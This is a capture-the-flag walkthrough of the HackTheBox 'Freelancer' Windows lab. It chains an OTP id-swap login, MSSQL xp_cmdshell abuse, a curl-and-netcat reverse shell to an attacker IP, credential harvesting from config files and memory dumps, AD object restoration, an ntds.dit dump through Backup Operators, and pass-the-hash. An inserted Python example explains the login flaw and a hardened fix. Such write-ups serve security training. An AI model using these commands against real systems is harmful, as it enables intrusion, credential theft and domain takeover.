Freelancer
OS: Windows
Difficulty: Hard
Points: 40
Nmap
ports=$(nmap -p- --min-rate=5000 -T4 10.129.64.53 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV -oN nmap.txt 10.129.64.53
Nmap scan report for 10.129.64.53
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-02 06:54:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
64416/tcp open msrpc Microsoft Windows RPC
64420/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Enumeration
First we create a user as an employer.
If we try to log in we cannot, but it is possible to reset the password in order to get in.
Now we can authenticate as the employer, and there is an interesting section called QR-Code.
Enum users
Digging a little, we can enumerate users.
GET /accounts/profile/visit/2/ HTTP/1.1
Host: freelancer.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://freelancer.htb/blog/details/?article_id=12
Connection: keep-alive
Cookie: csrftoken=FbxM5FKMdMudJohQpDrOidxNglAqNQA3; sessionid=hdp9xfqeo26c907yf6jbaktqbktpkqh1
Upgrade-Insecure-Requests: 1
We see that the admin user has ID 2.
http://freelancer.htb/accounts/profile/visit/2/
QR code
If we scan the QR code we obtain a URL that we can use to authenticate without a password.
http://freelancer.htb/accounts/login/otp/MTAwMTI=/a89aef23f0b7a95b8d37a2fe580e3f82/
The MTAwMTI= part of the URL is base64; decoding it gives our user number, 10012.
Admin access
We copy the OTP code from the QR and modify the URL to access the admin account. We log out of our current user and browse to the following URL.
http://freelancer.htb/accounts/login/otp/Mg==/191c10c32ed0b19bc84a85b8056fc8d9/
We are now inside the admin account.
We can access the following portal.
http://freelancer.htb/admin/
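Why the id swap in the URL above works, and how binding the token to the user id prevents it, as an added example that is not the page's or the Freelancer application's code. The path layout follows the writeup's URLs; the HMAC scheme, the server key and the TTL are assumptions for the demo.

```python
import base64
import binascii
import hashlib
import hmac
import secrets
from typing import Optional

SERVER_KEY = secrets.token_bytes(32)   # constructed per-process secret for the demo
TOKEN_TTL = 300                        # seconds a QR login link stays valid


def encode_uid(user_id: int) -> str:
    # 10012 -> "MTAwMTI=", 2 -> "Mg==", the id segments seen in the writeup's URLs
    return base64.b64encode(str(user_id).encode()).decode()


def decode_uid(segment: str) -> int:
    return int(base64.b64decode(segment).decode())


def weak_login(path: str, issued_tokens: set) -> Optional[int]:
    """Scheme implied by the writeup: the token is validated on its own and the
    user id is taken from the URL, so swapping the id segment logs in as that id."""
    _, uid_seg, token = path.rstrip("/").rsplit("/", 2)
    return decode_uid(uid_seg) if token in issued_tokens else None


def hardened_link(user_id: int, now: int) -> str:
    """Issue a link whose token is an HMAC over (user_id, expiry) with the server key."""
    expires = now + TOKEN_TTL
    mac = hmac.new(SERVER_KEY, f"{user_id}:{expires}".encode(), hashlib.sha256).hexdigest()
    return f"/accounts/login/otp/{encode_uid(user_id)}/{expires}.{mac}/"


def hardened_login(path: str, now: int) -> Optional[int]:
    """Accept only if the token matches the id in the URL and has not expired.
    A real deployment would also record consumed tokens so each link is single use."""
    try:
        _, uid_seg, token = path.rstrip("/").rsplit("/", 2)
        user_id = decode_uid(uid_seg)
        expires_s, mac = token.split(".", 1)
        expires = int(expires_s)
    except (ValueError, binascii.Error):
        return None
    if now > expires:
        return None
    expected = hmac.new(SERVER_KEY, f"{user_id}:{expires}".encode(), hashlib.sha256).hexdigest()
    return user_id if hmac.compare_digest(expected, mac) else None
```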
MSSQL Impersonate
We can impersonate the sa user to run commands. We verify that this is possible with the following query.
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
sa
We enable xp_cmdshell to run system commands.
EXECUTE AS LOGIN = 'sa'
EXEC sp_configure 'show advanced options','1';
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell','1';
RECONFIGURE;
EXECUTE AS LOGIN = 'sa'
EXEC xp_cmdshell "net user"
Reverse Shell
We run the following query to get a reverse shell.
EXECUTE AS LOGIN = 'sa'
EXEC xp_cmdshell "mkdir c:\temp"
EXEC xp_cmdshell "curl 10.10.14.18/nc64.exe -o c:\temp\nc.exe"
EXEC xp_cmdshell "c:\temp\nc.exe 10.10.14.18 1234 -e cmd.exe"
Lateral Movement
We search the filesystem for passwords.
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\Resources\1033\sqlcm.xml
Program Files (x86)\Microsoft SQL Server\150\Tools\PowerShell\Modules\SQLPS\en\Microsoft.SqlServer.Management.PSSnapins.dll-Help.xml
Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI
Windows\Panther\MigLog.xml
Windows\System32\DriverStore\FileRepository\prnms012.inf_amd64_acb6d904135c6a14\Amd64\MSIPP.xml
Inside the following file we find a pair of passwords.
type Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
ADDCURRENTUSERASSQLADMIN="False"
The following credentials work to connect.
┌──(root㉿kali)-[~/htb/Box/Freelancer]
└─# crackmapexec smb 10.129.216.84 -u 'mikasaAckerman' -p 'IL0v3ErenY3ager'
SMB 10.129.216.84 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB 10.129.216.84 445 DC [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager
We get a reverse shell with the RunasCs.exe tool.
https://github.com/antonioCoco/RunasCs
RunasCs.exe mikasaAckerman IL0v3ErenY3ager "C:\temp\nc.exe 10.10.14.18 6666 -e cmd.exe" -t 0
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-539d8$\Default
[+] Async process 'C:\temp\nc.exe 10.10.14.18 6666 -e cmd.exe' with pid 4396 created in background.
┌──(root㉿kali)-[~/htb/Box/Freelancer]
└─# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.14.18] from (UNKNOWN) [10.129.216.84] 59496
Microsoft Windows [Version 10.0.17763.5830]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
freelancer\mikasaackerman
Privilege Escalation
In the directory c:\Users\mikasaAckerman\Desktop we find 2 files.
c:\Users\mikasaAckerman\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8954-28AE
Directory of c:\Users\mikasaAckerman\Desktop
05/28/2024 10:22 AM <DIR> .
05/28/2024 10:22 AM <DIR> ..
10/28/2023 06:23 PM 1,468 mail.txt
10/04/2023 01:47 PM 292,692,678 MEMORY.7z
06/02/2024 12:09 PM 34 user.txt
We download the file.
nc -lvnp 7777 > MEMORY.7z
c:\temp\nc.exe -w 700 10.10.14.18 7777 < MEMORY.7z
Analyzing DMP File
We use the following tool, in its Windows version, to mount MEMORY.DMP.
https://github.com/ufrisk/MemProcFS
MemProcFS.exe -device MEMORY.DMP -forensic 0
Once mounted, we look for the SYSTEM, SAM and SECURITY hive files.
M:\registry\hive_files
Now that we have the files, we use impacket to extract the information.
impacket-secretsdump -system 0xffffd30679c46000-SYSTEM-MACHINE_SYSTEM.reghive -sam 0xffffd3067d935000-SAM-MACHINE_SAM.reghive -security 0xffffd3067d7f0000-SECURITY-MACHINE_SECURITY.reghive LOCAL
[*] _SC_MSSQL$DATA
(Unknown User):PWN3D#l0rr@Armessa199
[*] Cleaning up...
The password we obtained works for the user lorra199.
crackmapexec smb 10.129.185.251 -u users.txt -p 'PWN3D#l0rr@Armessa199' --continue
SMB 10.129.185.251 445 DC [+] freelancer.htb\lorra199:PWN3D#l0rr@Armessa199
BloodHound Enum
Using BloodHound we can enumerate the AD objects.
python3 /opt/BloodHound.py/bloodhound.py -u 'mikasaAckerman' -p 'IL0v3ErenY3ager' -d freelancer.htb -c all -ns 10.129.216.84
INFO: Found AD domain: freelancer.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.freelancer.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.freelancer.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 8 computers
INFO: Connecting to LDAP server: dc.freelancer.htb
INFO: Found 30 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SetupMachine.freelancer.htb
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: Datacenter-2019
INFO: Querying computer: DC.freelancer.htb
WARNING: Could not resolve: Datacenter-2019: The resolution lifetime expired after 3.115 seconds: Server Do53:10.129.216.84@53 answered The DNS operation timed out.
INFO: Done in 00M 32S
The user lorra199 has the GenericWrite privilege over the AD Recycle Bin group.
We get a reverse shell.
RunasCs.exe lorra199 'PWN3D#l0rr@Armessa199' "C:\temp\nc.exe 10.10.14.47 7777 -e cmd.exe" -t 0
┌──(root㉿kali)-[/opt/windows]
└─# nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.47] from (UNKNOWN) [10.129.185.251] 60453
Microsoft Windows [Version 10.0.17763.5830]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
freelancer\lorra199
Using the following command we can find out which objects have been deleted and can be recovered.
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
We see the user liza.kazanof, who belongs to the Remote Management Users and Backup Operators groups. We can restore the user as follows.
Restore-ADObject -Identity "ebe15df5-e265-45ec-b7fc-359877217138" -NewName "lkazanof_tmp"
We verify that the user was restored.
crackmapexec winrm 10.129.185.251 -u liza.kazanof -p 'RockYou!'
SMB 10.129.185.251 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:freelancer.htb)
HTTP 10.129.185.251 5985 DC [*] http://10.129.185.251:5985/wsman
WINRM 10.129.185.251 5985 DC [+] freelancer.htb\liza.kazanof:RockYou! (Pwn3d!)
Liza's password was obtained with WinDbg and mimikatz, following this resource: https://diverto.hr/en/blog/en-2019-11-05-Extracting-Passwords-from-hiberfil-and-memdumps/
Backup Operators
This user belongs to the Backup Operators group, so we can use it to escalate privileges.
evil-winrm -i 10.129.185.251 -u liza.kazanof -p 'RockYou!'
*Evil-WinRM* PS C:\Users\liza.kazanof\Documents> net user liza.kazanof
User name liza.kazanof
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/14/2024 6:37:29 PM
Password expires 6/25/2024 6:37:29 PM
Password changeable 5/15/2024 6:37:29 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
We create a shadow copy of the C: volume as follows.
echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
diskshadow.exe /s c:\temp\diskshadow.txt
We copy the necessary files.
robocopy /b Z:\Windows\System32\Config C:\temp SAM
robocopy /b Z:\Windows\System32\Config C:\temp SYSTEM
robocopy /b Z:\Windows\NTDS C:\temp ntds.dit
We download them.
download ntds.dit
download SAM
download SYSTEM
Now we dump the files.
impacket-secretsdump -system SYSTEM -sam SAM -ntds ntds.dit LOCAL
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379:::
With this we can pass-the-hash and get Administrator.
evil-winrm -i 10.129.185.251 -u Administrator -H 0039318f1e8274633445bce32ad1a290